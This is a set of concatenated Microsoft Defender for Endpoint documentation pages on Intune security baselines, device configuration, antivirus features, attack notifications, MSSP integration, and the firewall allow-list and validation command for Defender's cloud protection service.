-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-abovefoldlink)
-
-Security baselines ensure that security features are configured according to guidance from both security experts and expert Windows system administrators. When deployed, the Defender for Endpoint security baseline sets Defender for Endpoint security controls to provide optimal protection.
-
-To understand security baselines and how they're assigned on Intune using configuration profiles, [read this FAQ](/intune/security-baselines#q--a).
-
-Before you can deploy and track compliance to security baselines:
--- [Enroll your devices to Intune management](configure-machines.md#enroll-devices-to-intune-management)-- [Ensure you have the necessary permissions](configure-machines.md#obtain-required-permissions)-
-## Compare the Microsoft Defender for Endpoint and the Windows Intune security baselines
-
-The Windows Intune security baseline provides a comprehensive set of recommended settings needed to securely configure devices running Windows, including browser settings, PowerShell settings, and settings for some security features like Microsoft Defender Antivirus. In contrast, the Defender for Endpoint baseline provides settings that optimize all the security controls in the Defender for Endpoint stack, including settings for endpoint detection and response (EDR) and settings also found in the Windows Intune security baseline. For more information about each baseline, see:
--- [Windows security baseline settings for Intune](/intune/security-baseline-settings-windows)-- [Microsoft Defender for Endpoint baseline settings for Intune](/intune/security-baseline-settings-defender-atp)-
-Ideally, devices onboarded to Defender for Endpoint are deployed both baselines: the Windows Intune security baseline to initially secure Windows and then the Defender for Endpoint security baseline layered on top to optimally configure the Defender for Endpoint security controls. To benefit from the latest data on risks and threats and to minimize conflicts as baselines evolve, always apply the latest versions of the baselines across all products as soon as they're released.
-
-> [!NOTE]
-> The Defender for Endpoint security baseline has been optimized for physical devices and is currently not recommended for use on virtual machine (VMs) or VDI endpoints. Certain baseline settings can impact remote interactive sessions on virtualized environments.
-
-## Monitor compliance to the Defender for Endpoint security baseline
-
-The **Security baseline** card on [device configuration management](configure-machines.md) provides an overview of compliance across Windows 10 and Windows 11 devices that have been assigned the Defender for Endpoint security baseline.
--
-*Card showing compliance to the Defender for Endpoint security baseline*
-
-Each device is given one of the following status types:
--- **Matches baseline**: Device settings match all the settings in the baseline.-- **Does not match baseline**: At least one device setting doesn't match the baseline.-- **Misconfigured**: At least one baseline setting isn't properly configured on the device and is in a conflict, error, or pending state.-- **Not applicable**: At least one baseline setting isn't applicable on the device.-
-To review specific devices, select **Configure security baseline** on the card. This takes you to Intune device management. From there, select **Device status** for the names and statuses of the devices.
-
-> [!NOTE]
-> You might experience discrepancies in aggregated data displayed on the device configuration management page and those displayed on overview screens in Intune.
-
-## Review and assign the Microsoft Defender for Endpoint security baseline
-
-Device configuration management monitors baseline compliance only of Windows 10 and Windows 11 devices that have been specifically assigned the Microsoft Defender for Endpoint security baseline. You can conveniently review the baseline and assign it to devices on Intune device management.
-
-1. Select **Configure security baseline** on the **Security baseline** card to go to Intune device management. A similar overview of baseline compliance is displayed.
-
- > [!TIP]
- > Alternatively, you can navigate to the Defender for Endpoint security baseline in the Microsoft Azure portal from **All services > Intune > Device security > Security baselines > Microsoft Defender ATP baseline**.
-
-2. Create a new profile.
-
- :::image type="content" source="media/secconmgmt-baseline-intuneprofile1.png" alt-text="The Create profile tab in the Microsoft Defender for Endpoint security baseline overview on Intune" lightbox="media/secconmgmt-baseline-intuneprofile1.png":::<br>
- *Microsoft Defender for Endpoint security baseline overview on Intune*
-
-3. During profile creation, you can review and adjust specific settings on the baseline.
-
- :::image type="content" source="media/secconmgmt-baseline-intuneprofile2.png" alt-text="The Security baseline options during profile creation on Intune" lightbox="media/secconmgmt-baseline-intuneprofile2.png":::<br>
- *Security baseline options during profile creation on Intune*
-
-4. Assign the profile to the appropriate device group.
-
- :::image type="content" source="media/secconmgmt-baseline-intuneprofile3.png" alt-text="The Security baseline profiles on Intune" lightbox="media/secconmgmt-baseline-intuneprofile3.png":::<br>
- *Assigning the security baseline profile on Intune*
-
-5. Create the profile to save it and deploy it to the assigned device group.
-
- :::image type="content" source="media/secconmgmt-baseline-intuneprofile4.png" alt-text="Assigning the security baseline on Intune" lightbox="media/secconmgmt-baseline-intuneprofile4.png":::<br>
- *Creating the security baseline profile on Intune*
-
-> [!TIP]
-> Security baselines on Intune provide a convenient way to comprehensively secure and protect your devices. [Learn more about security baselines on Intune](/intune/security-baselines).
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-belowfoldlink)
-
-## Related articles
--- [Ensure your devices are configured properly](configure-machines.md)-- [Get devices onboarded to Microsoft Defender for Endpoint](configure-machines-onboarding.md)-- [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security Configure Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines.md
- Title: Ensure your devices are configured properly
-description: Properly configure devices to boost overall resilience against threats and enhance your capability to detect and respond to attacks.
------- m365-security-- tier2--- Previously updated : 04/04/2024--
-# Ensure your devices are configured properly
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-abovefoldlink)
-
-With properly configured devices, you can boost overall resilience against threats and enhance your capability to detect and respond to attacks. Security configuration management helps ensure that your devices:
--- Onboard to Microsoft Defender for Endpoint-- Meet or exceed the Defender for Endpoint security baseline configuration-- Have strategic attack surface mitigations in place-
-Click **Configuration management** from the navigation menu to open the Device configuration management page.
--
-*Device configuration management page*
-
-You can track configuration status at an organizational level and quickly take action in response to poor onboarding coverage, compliance issues, and poorly optimized attack surface mitigations through direct, deep links to device management pages on Microsoft Intune and <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-In doing so, you benefit from:
--- Comprehensive visibility of the events on your devices-- Robust threat intelligence and powerful device learning technologies for processing raw events and identifying the breach activity and threat indicators-- A full stack of security features configured to efficiently stop the installation of malicious implants, hijacking of system files and process, data exfiltration, and other threat activities-- Optimized attack surface mitigations, maximizing strategic defenses against threat activity while minimizing impact to productivity-
-## Enroll devices to Intune management
-
-Device configuration management works closely with Intune device management to establish the inventory of the devices in your organization and the baseline security configuration. You will be able to track and manage configuration issues on Intune-managed Windows devices.
-
-Before you can ensure your devices are configured properly, enroll them to Intune management. Intune enrollment is robust and has several enrollment options for Windows devices. For more information about Intune enrollment options, read about [setting up enrollment for Windows devices](/intune/windows-enroll).
-
-> [!NOTE]
-> To enroll Windows devices to Intune, administrators must have already been assigned licenses. [Read about assigning licenses for device enrollment](/intune/licenses-assign).
-
-> [!TIP]
-> To optimize device management through Intune, [connect Intune to Defender for Endpoint](/intune/advanced-threat-protection#enable-windows-defender-atp-in-intune).
-
-## Obtain required permissions
-
-By default, only users who have been assigned the Global Administrator or the Intune Service Administrator role on Microsoft Entra ID can manage and assign the device configuration profiles needed for onboarding devices and deploying the security baseline.
-
-If you have been assigned other roles, ensure you have the necessary permissions:
--- Full permissions to device configurations-- Full permissions to security baselines-- Read permissions to device compliance policies-- Read permissions to the organization--
-*Device configuration permissions on Intune*
-
-> [!TIP]
-> To learn more about assigning permissions on Intune, [read about creating custom roles](/intune/create-custom-role#to-create-a-custom-role).
-
-## In this section
-
-Topic|Description
-:|:
-[Get devices onboarded to Defender for Endpoint](configure-machines-onboarding.md)|Track onboarding status of Intune-managed devices and onboard more devices through Intune.
-[Increase compliance to the Defender for Endpoint security baseline](configure-machines-security-baseline.md)|Track baseline compliance and noncompliance. Deploy the security baseline to more Intune-managed devices.
-[Optimize ASR rule deployment and detections](configure-machines-asr.md)|Review rule deployment and tweak detections using impact analysis tools in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-belowfoldlink)
security Configure Microsoft Defender Antivirus Features https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-microsoft-defender-antivirus-features.md
- Title: Configure Microsoft Defender Antivirus features
-description: You can configure Microsoft Defender Antivirus features with Intune, Microsoft Configuration Manager, Group Policy, and PowerShell.
----------- m365-security-- tier2-- mde-ngp Previously updated : 02/18/2024--
-# Configure Microsoft Defender Antivirus features
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-You can configure Microsoft Defender Antivirus with a number of tools, such as:
--- [Microsoft Defender for Endpoint Security Policy Management](/mem/intune/protect/mde-security-integration)-- [Microsoft Intune](/microsoft-365/security/defender-endpoint/use-intune-config-manager-microsoft-defender-antivirus)-- [Microsoft Configuration Manager](/microsoft-365/security/defender-endpoint/manage-mde-post-migration-configuration-manager)-- Microsoft Configuration Manager [Tenant attach](/mem/configmgr/tenant-attach/)--- [Group Policy](/microsoft-365/security/defender-endpoint/use-group-policy-microsoft-defender-antivirus)-- [PowerShell cmdlets](/microsoft-365/security/defender-endpoint/use-powershell-cmdlets-microsoft-defender-antivirus)-- [Windows Management Instrumentation (WMI)](/microsoft-365/security/defender-endpoint/use-wmi-microsoft-defender-antivirus)
-The following broad categories of features can be configured:
--- Cloud-delivered protection. See [Cloud-delivered protection and Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md)--- Always-on real-time protection, including behavioral, heuristic, and machine learning-based protection. See [Configure behavioral, heuristic, and real-time protection](configure-protection-features-microsoft-defender-antivirus.md).--- How end users interact with the client on individual endpoints. See the following resources:
- - [Prevent users from seeing or interacting with the Microsoft Defender Antivirus user interface](prevent-end-user-interaction-microsoft-defender-antivirus.md)
- - [Prevent or allow users to locally modify Microsoft Defender Antivirus policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)
-
-> [!TIP]
-> Review [Reference topics for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md).
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
->
-
security Configure Microsoft Threat Experts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-microsoft-threat-experts.md
- Title: Configure and manage Microsoft Defender Experts capabilities-
-description: Register to Microsoft Threats Experts to configure, manage, and use it in your daily security operations and security administration work.
------- m365-security-- tier1- Previously updated : 12/18/2020--
-# Configure and manage Endpoint Attack Notifications
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-## Before you begin
-
-> [!NOTE]
-> Discuss the eligibility requirements with your Microsoft Technical Service provider and account team before you apply to Endpoint Attack Notifications managed threat hunting service.
-
-Ensure that you have Defender for Endpoint deployed in your environment with devices enrolled, and not just on a laboratory set-up.
-
-If you're a Defender for Endpoint customer, you need to apply for **Endpoint Attack Notifications** to get special insights and analysis to help identify the most critical threats, so you can respond to them quickly.
-
-## Apply for Endpoint Attack Notifications service
-
-If you're already a Defender for Endpoint customer, you can apply through the Microsoft Defender portal.
-
-1. From the navigation pane, go to **Settings > General > Advanced features > Endpoint Attack Notifications**.
-
-2. Click **Apply**.
-
- :::image type="content" source="media/mte-collaboratewithmte.png" alt-text="The Microsoft Defender Experts settings" lightbox="media/mte-collaboratewithmte.png":::
-
-3. Enter your name and email address so that Microsoft can get back to you on your application.
-
- :::image type="content" source="media/mte-apply.png" alt-text="The Name field on the Microsoft Defender Experts application page" lightbox="media/mte-apply.png":::
-
-4. Read the [privacy statement](https://privacy.microsoft.com/privacystatement), then click **Submit** when you're done. You'll receive a welcome email once your application is approved.
-
- :::image type="content" source="media/mte-applicationconfirmation.png" alt-text="The Microsoft Defender Experts application confirmation message" lightbox="media/mte-applicationconfirmation.png":::
-
-When accepted, you'll receive a welcome email and you'll see the **Apply** button change to a toggle that is "on". In case you want to take yourself out of the Endpoint Attack Notifications service, slide the toggle "off" and click **Save preferences** at the bottom of the page.
-
-## Where you'll see the Endpoint Attack Notifications
-
-You can receive targeted attack notification from Microsoft Defender Experts through the following medium:
--- The Defender for Endpoint portal's **Incidents** page-- The Defender for Endpoint portal's **Alerts** dashboard-- OData alerting [API](/windows/security/threat-protection/microsoft-defender-atp/get-alerts) and [REST API](/windows/security/threat-protection/microsoft-defender-atp/pull-alerts-using-rest-api)-- [DeviceAlertEvents](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-devicealertevents-table) table in Advanced hunting-- Your email, if you choose to configure it-
-To receive Endpoint Attack Notifications through email, create an email notification rule.
-
-### Create an email notification rule
-
-You can create rules to send email notifications for notification recipients. See [Configure alert notifications](configure-email-notifications.md) to create, edit, delete, or troubleshoot email notification, for details.
-
-## View the Endpoint Attack Notifications
-
-You'll start receiving Endpoint Attack Notifications from Microsoft Defender Experts in your email after you've configured your system to receive email notification.
-
-1. Click the link in the email to go to the corresponding alert context in the dashboard tagged with **Threat experts**.
-
-2. From the dashboard, select the same alert topic that you got from the email, to view the details.
-
-### Filter to view just the Endpoint Attack Notifications
-
-You can filter your incidents and alerts if you want to only see the Endpoint Attack Notifications amongst the many alerts. To do so:
-
-1. On the navigation menu, go to **Incidents & alerts** > **Incidents**/**Alerts** > select the ![Filter to view Defender Experts notifications](../../media/mte/defenderexperts/filter.png) icon.
-2. Scroll down to the Tags field > select the **Defender Experts** check box.
-3. Select **Apply**.
-
-#### To proactively hunt threats across endpoints, Office 365, cloud applications, and identity, refer to
--- [Microsoft Defender Experts in Microsoft 365 Overview](../defender/defender-experts-for-hunting.md)
security Configure Mssp Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-mssp-notifications.md
- Title: Configure alert notifications that are sent to MSSPs
-description: Configure alert notifications that are sent to MSSPs
------- m365-security-- tier1- Previously updated : 12/18/2020--
-# Configure alert notifications that are sent to MSSPs
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-mssp-support-abovefoldlink)
-
-> [!NOTE]
-> This step can be done by either the MSSP customer or MSSP. MSSPs must be granted the appropriate permissions to configure this on behalf of the MSSP customer.
-
-After access the portal is granted, alert notification rules can be created so that emails are sent to MSSPs when alerts associated with the tenant are created and set conditions are met.
-
-For more information, see [Create rules for alert notifications](configure-email-notifications.md#create-rules-for-alert-notifications).
-
-These check boxes must be checked:
--- **Include organization name** - The customer name will be added to email notifications-- **Include tenant-specific portal link** - Alert link URL will have tenant specific parameter (tid=target_tenant_id) that allows direct access to target tenant portal-
-## Related topics
--- [Grant MSSP access to the portal](grant-mssp-access.md)-- [Access the MSSP customer portal](access-mssp-portal.md)-- [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security Configure Mssp Support https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-mssp-support.md
- Title: Configure managed security service provider support
-description: Take the necessary steps to configure the MSSP integration with the Microsoft Defender for Endpoint
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Configure managed security service provider integration
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-mssp-support-abovefoldlink)
--
-To enable the managed security service provider (MSSP) integration, follow the guidance in this article.
-
-> [!NOTE]
-> The following terms are used in this article to distinguish between the service provider and service consumer:
->
-> - MSSPs: Security organizations that offer to monitor and manage security devices for an organization.
-> - MSSP customers: Organizations that engage the services of MSSPs.
-
-The integration allows MSSPs to take the following actions:
--- Get access to MSSP customer's Microsoft Defender portal-- Get email notifications, and-- Fetch alerts through security information and event management (SIEM) tools-
-Before MSSPs can take these actions, the MSSP customer needs to grant access to their Defender for Endpoint tenant so that the MSSP can access the portal.
-
-Typically, MSSP customers take the initial configuration steps to grant MSSPs access to their Windows Defender Security Central tenant. After access is granted, the MSSP or customer can do the other configuration steps. In general, these are the configuration steps to complete:
-
-| Step | Who does it|
-|||
-| **Grant the MSSP access to Microsoft Defender XDR**. This action grants the MSSP access to the MSSP customer's Defender for Endpoint tenant. | MSSP Customer |
-| **Configure alert notifications sent to MSSPs**. This action lets the MSSPs know what alerts they need to address for the MSSP customer. | MSSP customer or MSSP |
-| **Fetch alerts from MSSP customer's tenant into SIEM system**. This action allows MSSPs to fetch alerts in SIEM tools. | MSSP |
-| **Fetch alerts from MSSP customer's tenant using APIs**. This action allows MSSPs to fetch alerts using APIs. | MSSP |
-
-## Multi-tenant access for MSSPs
-
-For information on how to implement a multitenant delegated access, see [Multi-tenant access for Managed Security Service Providers](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/multi-tenant-access-for-managed-security-service-providers/ba-p/1533440).
-
-## Related articles
--- [Grant MSSP access to the portal](grant-mssp-access.md)-- [Access the MSSP customer portal](access-mssp-portal.md)-- [Configure alert notifications](configure-mssp-notifications.md)-- [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security Configure Network Connections Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus.md
- Title: Configure and validate Microsoft Defender Antivirus network connections
-description: Configure and test your connection to the Microsoft Defender Antivirus cloud protection service.
------- Previously updated : 06/26/2023---- m365-security-- tier2-- mde-ngp--
-# Configure and validate Microsoft Defender Antivirus network connections
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-To ensure Microsoft Defender Antivirus cloud-delivered protection works properly, your security team must configure your network to allow connections between your endpoints and certain Microsoft servers. This article lists connections that must be allowed for using the firewall rules. It also provides instructions for validating your connection. Configuring your protection properly ensures you receive the best value from your cloud-delivered protection services.
-
-> [!IMPORTANT]
-> This article contains information about configuring network connections only for Microsoft Defender Antivirus. If you are using Microsoft Defender for Endpoint (which includes Microsoft Defender Antivirus), see [Configure device proxy and Internet connectivity settings for Defender for Endpoint](configure-proxy-internet.md).
-
-## Allow connections to the Microsoft Defender Antivirus cloud service
-
-The Microsoft Defender Antivirus cloud service provides fast, and strong protection for your endpoints. It's optional to enable the cloud-delivered protection service. Microsoft Defender Antivirus cloud service is recommended, because it provides important protection against malware on your endpoints and network. For more information, see [Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) for enabling service with Intune, Microsoft Endpoint Configuration Manager, Group Policy, PowerShell cmdlets, or individual clients in the Windows Security app.
-
-After you've enabled the service, you need to configure your network or firewall to allow connections between network and your endpoints. Because your protection is a cloud service, computers must have access to the internet and reach the Microsoft cloud services. Don't exclude the URL `*.blob.core.windows.net` from any kind of network inspection.
-
-> [!NOTE]
-> The Microsoft Defender Antivirus cloud service delivers updated protection to your network and endpoints. The cloud service should not be considered as only protection for your files that are stored in the cloud; instead, the cloud service uses distributed resources and machine learning to deliver protection for your endpoints at a faster rate than the traditional Security intelligence updates.
-
-## Services and URLs
-
-The table in this section lists services and their associated website addresses (URLs).
-
-Make sure that there are no firewall or network filtering rules denying access to these URLs. Otherwise, you must create an allow rule specifically for those URLs (excluding the URL `*.blob.core.windows.net`). The URLs in the following table use port 443 for communication. (Port 80 is also required for some URLs, as noted in the following table.)
-
-|Service and description|URL|
-|||
-|Microsoft Defender Antivirus cloud-delivered protection service is referred to as Microsoft Active Protection Service (MAPS).<br/> Microsoft Defender Antivirus uses the MAPS service to provide cloud-delivered protection.|`*.wdcp.microsoft.com` <br/>`*.wdcpalt.microsoft.com`<br/>`*.wd.microsoft.com` |
-|Microsoft Update Service (MU) and Windows Update Service (WU)<br/>These services allow security intelligence and product updates.|`*.update.microsoft.com`<br/>`*.delivery.mp.microsoft.com`<br/>`*.windowsupdate.com` <br/>`ctldl.windowsupdate.com`<br/><br/>For more information, see [Connection endpoints for Windows Update](/windows/privacy/manage-windows-1709-endpoints#windows-update).|
-|Security intelligence updates Alternate Download Location (ADL)<br/>This is an alternate location for Microsoft Defender Antivirus Security intelligence updates, if the installed Security intelligence is out of date (Seven or more days behind).|`*.download.microsoft.com`<br/>`*.download.windowsupdate.com` (Port 80 is required)<br/>`go.microsoft.com` (Port 80 is required)<br/>`https://www.microsoft.com/security/encyclopedia/adlpackages.aspx` <br/>`https://definitionupdates.microsoft.com/download/DefinitionUpdates/`<br/>`https://fe3cr.delivery.mp.microsoft.com/ClientWebService/client.asmx`|
-|Malware submission storage<br/>This is an upload location for files submitted to Microsoft via the Submission form or automatic sample submission.|`ussus1eastprod.blob.core.windows.net`<br/>`ussus2eastprod.blob.core.windows.net`<br/>`ussus3eastprod.blob.core.windows.net`<br/>`ussus4eastprod.blob.core.windows.net`<br/>`wsus1eastprod.blob.core.windows.net`<br/>`wsus2eastprod.blob.core.windows.net`<br/>`ussus1westprod.blob.core.windows.net`<br/>`ussus2westprod.blob.core.windows.net`<br/>`ussus3westprod.blob.core.windows.net`<br/>`ussus4westprod.blob.core.windows.net`<br/>`wsus1westprod.blob.core.windows.net`<br/>`wsus2westprod.blob.core.windows.net`<br/>`usseu1northprod.blob.core.windows.net`<br/>`wseu1northprod.blob.core.windows.net`<br/>`usseu1westprod.blob.core.windows.net`<br/>`wseu1westprod.blob.core.windows.net`<br/>`ussuk1southprod.blob.core.windows.net`<br/>`wsuk1southprod.blob.core.windows.net`<br/>`ussuk1westprod.blob.core.windows.net`<br/>`wsuk1westprod.blob.core.windows.net`|
-|Certificate Revocation List (CRL)<br/>Windows use this list while creating the SSL connection to MAPS for updating the CRL.|`http://www.microsoft.com/pkiops/crl/`<br/>`http://www.microsoft.com/pkiops/certs`<br/>`http://crl.microsoft.com/pki/crl/products`<br/>`http://www.microsoft.com/pki/certs`|
-|Universal GDPR Client<br/>Windows use this client to send the client diagnostic data.<br/><br/>Microsoft Defender Antivirus uses General Data Protection Regulation for product quality, and monitoring purposes.|The update uses SSL (TCP Port 443) to download manifests and upload diagnostic data to Microsoft that uses the following DNS endpoints:<br/>`vortex-win.data.microsoft.com`<br/>`settings-win.data.microsoft.com`|
-
-## Validate connections between your network and the cloud
-
-After allowing the URLs listed, test whether you're connected to the Microsoft Defender Antivirus cloud service. Test the URLs are correctly reporting and receiving information to ensure you're fully protected.
-
-### Use the cmdline tool to validate cloud-delivered protection
-
-Use the following argument with the Microsoft Defender Antivirus command-line utility (`mpcmdrun.exe`) to verify that your network can communicate with the Microsoft Defender Antivirus cloud service:
-
-```console
-"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection
-```
-
-> [!NOTE]
-> Open Command Prompt as an administrator. Right-click the item in the **Start** menu, click **Run as administrator** and click **Yes** at the permissions prompt. This command will only work on Windows 10, version 1703 or higher, or Windows 11.
-
-For more information, see [Manage Microsoft Defender Antivirus with the mpcmdrun.exe commandline tool](command-line-arguments-microsoft-defender-antivirus.md).
-
-Use the tables below to see error messages you might encounter along with information on the root cause and possible solutions:
-
-|Error messages|Root cause|
-|:|:|:|
-|Start Time: <Day_of_the_week> MM DD YYYY HH:MM:SS <br/> MpEnsureProcessMitigationPolicy: hr = 0x1 <br/> ValidateMapsConnection<br/>ValidateMapsConnection failed to establish a connection to MAPS (hr=0x80070006 httpcore=451)<br/> MpCmdRun.exe: hr = 0x80070006**<br/><br/> ValidateMapsConnection failed to establish a connection to MAPS (hr=0x80072F8F httpcore=451)<br/>MpCmdRun.exe: hr = 0x80072F8F <br/><br/> ValidateMapsConnection failed to establish a connection to MAPS (hr=0x80072EFE httpcore=451)<br/> MpCmdRun.exe: hr = 0x80072EFE| The root cause of these error messages is that the device doesn't have its system-wide WinHttp proxy configured. If you donΓÇÖt set the system-wide WinHttp proxy, then the operating system isn't aware of the proxy and canΓÇÖt fetch the CRL (the operating system does this, not Defender for Endpoint), which means that TLS connections to URLs like `http://cp.wd.microsoft.com/` will not fully succeed. You'll see successful (response 200) connections to the endpoints but the MAPS connections would still fail.|
-
-|Solution|Description|
-|:|:|
-|Solution (Preferred) | Configure the system-wide WinHttp proxy that allows the CRL check.|
-|Solution (Preferred 2) | - [Setup Redirect the Microsoft Automatic Update URL for a disconnected environment](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265983(v=ws.11)?redirectedfrom=MSDN) <br/> - [Configure a server that has access to the Internet to retrieve the CTL files](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265983(v=ws.11)?redirectedfrom=MSDN) <br/> - [Redirect the Microsoft Automatic Update URL for a disconnected environment](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265983(v=ws.11)?redirectedfrom=MSDN) <br/> <br/> _Useful references:_ <br/> - Go to **Computer Configuration > Windows Settings > Security Settings > Public Key Policies > Certificate Path Validation Settings** > **Select the Network Retrieval tab** > **Select Define these policy settings** > **Select to clear the Automatically update certificates in the Microsoft Root Certificate Program (recommended) check box.** <br/> - [Certificate Revocation List (CRL) Verification - an Application Choice](https://social.technet.microsoft.com/wiki/contents/articles/964.certificate-revocation-list-crl-verification-an-application-choice.aspx) <br/> - [https://support.microsoft.com/help/931125/how-to-get-a-root-certificate-update-for-windows](https://support.microsoft.com/help/931125/how-to-get-a-root-certificate-update-for-windows) <br/> - [https://technet.microsoft.com/library/dn265983(v=ws.11).aspx](https://technet.microsoft.com/library/dn265983(v=ws.11).aspx) <br/> - [/dotnet/framework/configure-apps/file-schema/runtime/generatepublisherevidence-element](/dotnet/framework/configure-apps/file-schema/runtime/generatepublisherevidence-element) - [https://blogs.msdn.microsoft.com/amolravande/2008/07/20/improving-application-start-up-time-generatepublisherevidence-setting-in-machine-config/](https://blogs.msdn.microsoft.com/amolravande/2008/07/20/improving-application-start-up-time-generatepublisherevidence-setting-in-machine-config/)|
